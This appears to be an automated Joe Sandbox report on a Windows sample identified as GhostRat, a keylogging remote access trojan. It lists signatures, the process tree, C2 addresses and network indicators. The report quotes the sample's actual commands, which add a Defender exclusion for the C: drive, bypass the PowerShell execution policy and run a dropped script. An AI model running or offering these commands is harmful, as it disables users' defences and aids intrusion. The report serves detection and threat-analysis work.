Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HGwpjJUqhW.exe

Overview

General Information

Sample name:HGwpjJUqhW.exe
renamed because original name is a hash value
Original sample name:e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547.exe
Analysis ID:1584088
MD5:c4503d77f7a1bd9ad2b198d01e69bc43
SHA1:fbfe0b4981d65ee16d16fcff20b168f6c374c07f
SHA256:e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547
Tags:backdoorexewinosuser-zhuzhu0009
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • HGwpjJUqhW.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\HGwpjJUqhW.exe" MD5: C4503D77F7A1BD9AD2B198D01E69BC43)
    • cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7480 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 7584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • HGwpjJUqhW.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe" MD5: C4503D77F7A1BD9AD2B198D01E69BC43)
      • cmd.exe (PID: 4548 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6560 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2996 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3696 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7692 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7744 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7868 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7916 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

Threatname: GhostRat

{"C2 url": ["118.107.44.219:19091", "118.107.44.219:19092"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
HGwpjJUqhW.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    HGwpjJUqhW.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
              00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
                00000000.00000000.1671781833.00000000006F9000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    Click to see the 11 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    5.2.HGwpjJUqhW.exe.3401004.4.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      5.3.HGwpjJUqhW.exe.a64c83.0.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                        5.3.HGwpjJUqhW.exe.46c2c53.5.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                          5.3.HGwpjJUqhW.exe.a3301b.1.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                            5.3.HGwpjJUqhW.exe.46f486b.7.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                              Click to see the 15 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HGwpjJUqhW.exe", ParentImage: C:\Users\user\Desktop\HGwpjJUqhW.exe, ParentProcessId: 7344, ParentProcessName: HGwpjJUqhW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7428, ProcessName: cmd.exe
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HGwpjJUqhW.exe", ParentImage: C:\Users\user\Desktop\HGwpjJUqhW.exe, ParentProcessId: 7344, ParentProcessName: HGwpjJUqhW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 7868, ProcessName: cmd.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 7916, ProcessName: powershell.exe
                              Sigma detected: Change PowerShell Policies to an Insecure Level
                              Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7480, ProcessName: powershell.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HGwpjJUqhW.exe", ParentImage: C:\Users\user\Desktop\HGwpjJUqhW.exe, ParentProcessId: 7344, ParentProcessName: HGwpjJUqhW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7428, ProcessName: cmd.exe
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7480, ProcessName: powershell.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-04T05:38:50.993382+010020528751A Network Trojan was detected192.168.2.449743118.107.44.21919091TCP
                              2025-01-04T05:40:01.363847+010020528751A Network Trojan was detected192.168.2.449744118.107.44.21919091TCP
                              2025-01-04T05:41:05.444765+010020528751A Network Trojan was detected192.168.2.450012118.107.44.21919091TCP
                              2025-01-04T05:42:18.020381+010020528751A Network Trojan was detected192.168.2.450012118.107.44.21919091TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Found malware configuration
                              Source: HGwpjJUqhW.exe.7652.5.memstrminMalware Configuration Extractor: GhostRat {"C2 url": ["118.107.44.219:19091", "118.107.44.219:19092"]}
                              Multi AV Scanner detection for submitted file
                              Source: HGwpjJUqhW.exeVirustotal: Detection: 12%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
                              Source: pc_yyb_2700200680_installer.exe.0.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7a88b8ee-5

                              Compliance

                              barindex
                              Detected unpacking (overwrites its own PE header)
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeUnpacked PE file: 0.2.HGwpjJUqhW.exe.400000.0.unpack
                              Source: HGwpjJUqhW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: unknownHTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.4:49735 version: TLS 1.2
                              Source: Binary string: \Release\Code_Shellcode.pdb source: HGwpjJUqhW.exe, HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdb source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb& source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb$ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp4 source: powershell.exe, 0000000B.00000002.1814728739.00000000081E1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdbN source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: z:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: x:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: v:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: t:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: r:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: p:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: n:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: l:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: j:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: h:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: f:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: b:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: y:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: w:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: u:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: s:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: q:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: o:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: m:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: k:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: i:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: g:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile opened: [:Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,5_2_036280F0

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49743 -> 118.107.44.219:19091
                              Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49744 -> 118.107.44.219:19091
                              Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50012 -> 118.107.44.219:19091
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: 118.107.44.219:19091
                              Source: Malware configuration extractorURLs: 118.107.44.219:19092
                              Connects to many ports of the same IP (likely port scanning)
                              Source: global trafficTCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8
                              Source: global trafficTCP traffic: 192.168.2.4:49733 -> 118.107.44.219:8853
                              Source: Joe Sandbox ViewIP Address: 118.107.44.219 118.107.44.219
                              Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                              Source: global trafficHTTP traffic detected: GET /pc_yyb_2700200680_installer.exe HTTP/1.1User-Agent: URLDownloaderHost: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2094122035.00000000038BC000.00000004.00000010.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                              Source: pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2094122035.00000000038BC000.00000004.00000010.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
